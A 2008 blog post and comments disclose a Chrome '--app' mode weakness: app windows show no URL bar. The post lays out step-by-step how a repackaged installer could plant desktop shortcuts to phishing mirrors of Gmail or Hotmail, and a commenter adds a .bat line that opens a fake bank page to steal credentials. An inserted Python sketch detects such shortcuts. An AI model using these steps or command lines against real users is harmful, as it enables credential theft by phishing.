
Security Vulnerability with Google Chrome

by thebeebs 3. September 2008 02:01

Have you installed the new Google Chrome? Make sure you’re careful with your application shortcuts, because I just thought of a very easy way to phish basic users.

  1. Wrap the Chrome browser installation in your own InstallShield.
  2. Create a phishing mirror of Gmail or whatever site you want to phish.
  3. Add desktop shortcuts to the InstallShield which link to:
    "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe"  --app=http://login.live..yourfakehotmailwebsite.com
  4. Build your InstallShield.
  5. Stick a graphic on your website that says “Get Google Chrome Now” and link to your InstallShield build.

When the user installs Google Chrome from your link they'll get the browser, but they will also find some helpful desktop links to their Hotmail/Gmail/eBay account.

Because the Apps mode in Chrome loads in full screen with NO URL BAR (what were they thinking?), the user will happily click on the desktop links thinking they're just handy shortcuts that their friends at Google installed, not knowing they really link to our phishing mirror of Gmail.
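
From the defender's side, the same shortcut is easy to spot: inventory shortcut targets and script lines, then flag any that start Chrome with `--app=` against a host outside an expected set. The sketch below is an added example, not code from the original post; the allowlist, the brand-label list and the function names are assumptions, and the sample inventory is constructed (its first two command lines are the strings quoted on this page).

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this organisation expects in legitimate app-mode shortcuts.
ALLOWED_HOSTS = {"mail.google.com", "login.live.com"}
# Assumption: brand labels that should only appear in allowlisted hostnames.
BRAND_LABELS = {"google", "gmail", "live", "hotmail", "ebay"}

# chrome.exe (optionally closing a quoted path) followed by an --app=<url> argument.
APP_FLAG = re.compile(r'chrome\.exe"?\s.*?--app=("[^"]*"|\S+)', re.IGNORECASE)

def audit_command(cmdline):
    """Return findings for one shortcut target or script line ([] if clean)."""
    match = APP_FLAG.search(cmdline)
    if not match:
        return []  # not an app-mode launch
    parts = urlsplit(match.group(1).strip('"'))
    host = (parts.hostname or "").lower()
    findings = []
    if parts.scheme != "https":
        findings.append("no-tls")
    if host not in ALLOWED_HOSTS:
        findings.append("host-not-allowlisted")
        # A known brand label inside an unknown hostname suggests a look-alike.
        if BRAND_LABELS & set(host.split(".")):
            findings.append("brand-label-in-foreign-host")
    return findings

def audit_inventory(inventory):
    """Map shortcut name -> findings, keeping only flagged entries."""
    results = {name: audit_command(cmd) for name, cmd in inventory.items()}
    return {name: f for name, f in results.items() if f}

# Constructed inventory; the first two command lines are the strings quoted on this page.
CHROME = r'"C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe"'
SAMPLE = {
    "Hotmail.lnk": CHROME + "  --app=http://login.live..yourfakehotmailwebsite.com",
    "bank.bat": r"%homepath%\AppData\Local\Google\Chrome\Application\chrome.exe --app=http://www.malicious.net/fake-bank-page.html",
    "Gmail.lnk": CHROME + " --app=https://mail.google.com/",
    "Chrome.lnk": CHROME,
}

if __name__ == "__main__":
    for name, findings in audit_inventory(SAMPLE).items():
        print(name, findings)
```
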

Comments (4) -

hkm
hkm Mexico
9/3/2008 11:12:32 PM #

I also noted this issue; it is not wise to open pages without the location or certificate (SSL) information. This is an open door for spoofed pages.

A malicious user could send you a .bat file that, besides not getting detected by most AVs, contains the following code that, when run, opens what appears to be your online banking page but is in fact a fake webpage that steals your banking credentials.

%homepath%\AppData\Local\Google\Chrome\Application\chrome.exe --app=http://www.malicious.net/fake-bank-page.html


hkm

Terence
Terence Hong Kong S.A.R.
9/4/2008 5:05:22 AM #

Hi. I installed Chrome yesterday and found that Silverlight is not working on Chrome (a little bit disappointed).

Anyway, do you live in the UK? Do you know if there is any famous Flash or Silverlight forum in the UK? (Actually, because I want to promote my blog to European people.)

Martin Beeby
Martin Beeby United Kingdom
9/4/2008 6:34:12 AM #

Yes, I thought that was rubbish too. It sort of works but it's really buggy. I wonder what the issue is.

Yeah, I live in the UK. I don't belong to any Silverlight or Flash forums, I'm sorry.
